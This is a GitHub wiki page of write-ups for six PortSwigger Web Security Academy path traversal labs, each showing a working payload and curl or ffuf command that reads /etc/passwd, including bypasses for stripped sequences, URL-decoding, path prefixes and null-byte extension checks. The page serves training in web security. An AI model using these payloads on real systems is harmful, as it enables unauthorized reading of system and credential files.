File path traversal - gachikuku/portswigger GitHub Wiki

This lab contains a path traversal vulnerability in the display of product images.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Upon viewing the source code, we come across this.

     <section class="container-list-tiles">
         <div>
             <img src="/image?filename=38.jpg">
             <h3>Six Pack Beer Belt</h3>
             <img src="/resources/images/rating3.png">
             $69.42
             <a class="button" href="/product?productId=1">View details</a>
         </div>

     After inspecting /product?productId= and /image?filename=38.jpg
     we see that, the correct parameter to investigate it's the latter.

  2. When using the browser to get the contents of the crafted URL
     https://uuid.web-security-academy.net/image?filename=../../../etc/passwd
     we get the image ^URL^ cannot be displayed, because it contains errors.
     When using curl to view we got the contents thus pass the lab.

     curl "https://uuid.web-security-academy.net/image?filename=../../../etc/passwd"

This lab contains a path traversal vulnerability in the display of product images.
The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Launch lab and Inspect the requests made. Notice parameters like /image?filename=36.jpg found in mitmproxy.
  2. Change it to image?filename=/etc/passwd.
  3. Firefox displays an error: The image "https://uuid.web-security-academy.net/image?filename=/etc/passwd" cannot be displayed because it contains errors.
  4. To view "errors" do, curl "https://uuid.web-security-academy.net/image?filename=/etc/passwd"

This lab contains a path traversal vulnerability in the display of product images.
The application strips path traversal sequences from the user-supplied filename before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Launch lab and Inspect the requests made. Notice parameters like /image?filename=36.jpg found in mitmproxy.
  2. Change it to image?filename=....//....//....//etc/passwd.
  3. Firefox displays an error: The image "https://uuid.web-security-academy.net/image?filename=....//....//....//etc/passwd" cannot be displayed because it contains errors.
  4. To view "errors" do, curl "https://uuid.web-security-academy.net/image?filename=....//....//....//etc/passwd"

This lab contains a path traversal vulnerability in the display of product images.
The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Use the predefined payload for fuzzing path traversal.
  2. ffuf

     ffuf -u "https://uuid.web-security-academy.net/image?filename=FUZZ" -w traversal.txt -c

  3. curl an URL that is 200 matched.

This lab contains a path traversal vulnerability in the display of product images.
The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Change /image?filename=/var/www/images/37.jpg to /image?filename=/var/www/images/../../../etc/passwd

This lab contains a path traversal vulnerability in the display of product images.
The application validates that the supplied filename ends with the expected file extension.
To solve the lab, retrieve the contents of the /etc/passwd file.

• Solution

  1. Change /image?filename=22.jpg to /image?filename=../../../etc/passwd%00.jpg